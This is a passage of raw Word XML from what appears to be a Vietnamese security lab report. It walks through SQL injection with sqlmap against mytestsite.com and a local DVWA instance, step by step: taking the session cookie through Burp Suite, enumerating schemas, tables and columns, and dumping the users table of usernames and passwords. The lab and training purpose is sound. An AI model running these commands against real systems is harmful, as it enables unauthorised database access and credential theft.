      <w:r w:rsidRPr="001B783D">
        <w:t>Bảng users có 1 bản ghi chứa thông tin của username và password là "test", "test" Sử dụng tài khoản này, ta sẽ đăng nhập vào được hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3B3B4" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc175580489"/>
      <w:bookmarkStart w:id="8" w:name="_Toc175587844"/>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tấn công SQL Injection website mytestsite.com</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6E31E099" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u 'http://mytestsite.com/page.php?id=5'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A82301E" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="004F0F32" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u 'http://mytestsite.com/page.php?id=5'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0F32">
        <w:t>--random-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C9CFB" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="004F0F32" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u 'http://mytestsite.com/page.php?id=5'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0F32">
        <w:t>--tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F17DC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u 'http://mytestsite.com/page.php?id=5'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3463221F" w14:textId="296D1B23" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc175580490"/>
      <w:bookmarkStart w:id="10" w:name="_Toc175587845"/>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tấn công SQL Injection website 192.168.1.140</w:t>
      </w:r>
      <w:r w:rsidR="005C68C9">
        <w:t>/dvwa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2674C730" w14:textId="77777777" w:rsidR="002902BC" w:rsidRDefault="002902BC" w:rsidP="00B73FBC">
      <w:bookmarkStart w:id="11" w:name="_Toc36915686"/>
      <w:r w:rsidRPr="002902BC">
        <w:t>https://medium.com/@hashsleuth.info/how-to-exploit-dvwa-blind-sql-injection-sqli-with-sqlmap-and-burp-suite-e4b3f08a0dfc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661BB485" w14:textId="76C609D9" w:rsidR="00B73FBC" w:rsidRPr="00234C69" w:rsidRDefault="00B73FBC" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00234C69">
        <w:t>Cookie harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE94063" w14:textId="77777777" w:rsidR="00B73FBC" w:rsidRDefault="00B73FBC" w:rsidP="00B73FBC">
      <w:r w:rsidRPr="00234C69">
        <w:t>After logging into DVWA (Damn Vulnerable Web Application), navigate to the “SQL Injection (Blind)” section. Enter the value ‘2’ for the ‘id’ parameter, and then click the submit button. However, you might notice that nothing happens in the browser. This is because Burp Suite, the interception proxy, has intercepted the GET request in the URL. As a result, you won’t be able to successfully submit the request until you click the “Forward” option in Burp Suite to allow the request to proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9C4CA" w14:textId="50987407" w:rsidR="001A3A44" w:rsidRPr="00234C69" w:rsidRDefault="001A3A44" w:rsidP="001A3A44">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="001A3A44">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A808BD" wp14:editId="541FB4BD">
            <wp:extent cx="5940425" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="122751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9424" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2650490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D6EC2" w14:textId="452F1C5F" w:rsidR="00B73FBC" w:rsidRPr="00234C69" w:rsidRDefault="00B73FBC" w:rsidP="00B73FBC">
      <w:r w:rsidRPr="00234C69">
        <w:t>Now, let’s proceed to the “Proxy” section in our Burp Suite. Copy this information as we will use it in the next step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEEF21" w14:textId="3A9F9C4F" w:rsidR="00B73FBC" w:rsidRPr="00234C69" w:rsidRDefault="008F7C33" w:rsidP="008F7C33">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="008F7C33">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183C5EA4" wp14:editId="32AEEFB2">
            <wp:extent cx="5940425" cy="2380615"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635"/>
            <wp:docPr id="134090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07215" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2380615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB1C6C7" w14:textId="77777777" w:rsidR="00B73FBC" w:rsidRPr="00234C69" w:rsidRDefault="00B73FBC" w:rsidP="00B73FBC">
      <w:r w:rsidRPr="00234C69">
        <w:t>After clicking the “Forward” option in Burp Suite, go back to our browser. You’ll notice that after forwarding the request, our URL has changed, as indicated by the highlighting. Now, copy the updated URL as we will use it in our next step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30971FAB" w14:textId="7EF67341" w:rsidR="00B73FBC" w:rsidRDefault="00884A13" w:rsidP="00884A13">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00884A13">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB08F9B" wp14:editId="0D4649BE">
            <wp:extent cx="5940425" cy="2442210"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1425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6227" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="2442210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4710AA" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Scanning for vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30570BFF" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>In your terminal window, execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673FEFF" w14:textId="7B5119CA" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.140/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t>/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#" - cookie="security=low; PHPSESSID=9tp5mn3hpkfgh6fddmbampps7m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A2971" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>After pressing Enter, SQL map will establish a connection to the provided URL. It will then check if the GET parameter ‘id’ is dynamic, meaning it can be manipulated. Additionally, during the process, you can observe the actual payloads being submitted by SQL map as it attempts to exploit the SQL injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4C5B7" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>From the output below, it is evident that the “id” GET parameter in DVWA is susceptible to Boolean-based blind injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1681EC74" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="199DFC71" wp14:editId="5CEA315F">
            <wp:extent cx="6666865" cy="23552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66865" cy="2355215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158D1FF" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>SQL map prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CCB6D" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F74FDCE" wp14:editId="663977B7">
            <wp:extent cx="6666865" cy="119189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666865" cy="1191895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994D962" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>SQL map prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6454B3" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B283F1" wp14:editId="6C7C93EF">
            <wp:extent cx="6666865" cy="23609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666865" cy="2360930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A123788" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>further information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E95AD0" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Additionally, from the above output, we can gather further information about the target website. It appears that the website is running on Linux Debian, and it is using Apache version 2.4.57. Furthermore, the back-end database management system (DBMS) is identified as MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DA186" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>To utilize the default behavior and bypass any interactive prompts, you can add the “— batch’’ option to the SQL map command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A61DA" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Revealing the database schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8CFAC" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>to enumerate the available database schemas, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3CD67" w14:textId="3B8388F9" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.140/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t xml:space="preserve">/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=9tp5mn3hpkfgh6fddmbampps7m" --schema --batch   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7BD30A" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02441A6F" wp14:editId="0CAB5F3E">
            <wp:extent cx="5185305" cy="304282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190890" cy="3046107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C12C1" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>schema information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F485426" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Upon enumeration, two database names were retrieved: “dvwa” and “information_schema.” However, my focus is solely on the “dvwa” database, as it is the one of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D10E11" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Revealing the dvwa tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315A155" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>To retrieve the tables in the DVWA database, you can use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAF6CC" w14:textId="39A05D49" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.140/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t xml:space="preserve">/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=9tp5mn3hpkfgh6fddmbampps7m" -D dvwa --tables  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3ABD6F" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>The command -D was used to enumerate the database, while — tables was used to enumerate the tables within the DBMS database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82368C" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4455528F" wp14:editId="08DC796B">
            <wp:extent cx="5515184" cy="25230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529687" cy="2529677"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24736FEE" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:lastRenderedPageBreak/>
        <w:t>dvwa tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99B37B" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>The SQLMap output reveals two tables: “guestbook” and “users.” In our case, our focus is on the “users” table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52877476" w14:textId="5DEAE491" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Enumerate the “users” table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BB998" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>To determine the columns created in the “users” table within DVWA, you can use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BD72E" w14:textId="00C8C80C" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t>qlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.140/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t xml:space="preserve">/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=9tp5mn3hpkfgh6fddmbampps7m" --columns -T users --batch  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565AED2E" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>The command -T is used to enumerate the tables within the DBMS database, and — columns is used to enumerate the columns within a specific table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7949E602" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6236AAF1" wp14:editId="4267889B">
            <wp:extent cx="3226761" cy="535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232057" cy="5362286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309D4F0" w14:textId="1ABC94D3" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t>able users columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3AB88E" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:lastRenderedPageBreak/>
        <w:t>The SQLMap output indicates a total of 8 columns inside the “users” table. However, for our current interest, we are only concerned with the “user” and “password” columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6F05C" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>Dump Usernames and Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FFCBEB" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>To retrieve the usernames and passwords from the “user” and “password” columns in the “users” table, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483ECFAF" w14:textId="27309313" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.140/dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t>/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=9tp5mn3hpkfgh6fddmbampps7m" --dump -T users --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB25A32" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:t>The -C command is used to specify the column to enumerate, and the — dump command is used to dump the table entries,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B0009" w14:textId="77777777" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB6796">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1360F070" wp14:editId="1884A59C">
            <wp:extent cx="5509396" cy="2936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519551" cy="2941938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D4B3C" w14:textId="0605FC2E" w:rsidR="006C1FD1" w:rsidRPr="00DB6796" w:rsidRDefault="006C1FD1" w:rsidP="006C1FD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6796">
        <w:t>able users entries</w:t>
      </w:r>
    </w:p>
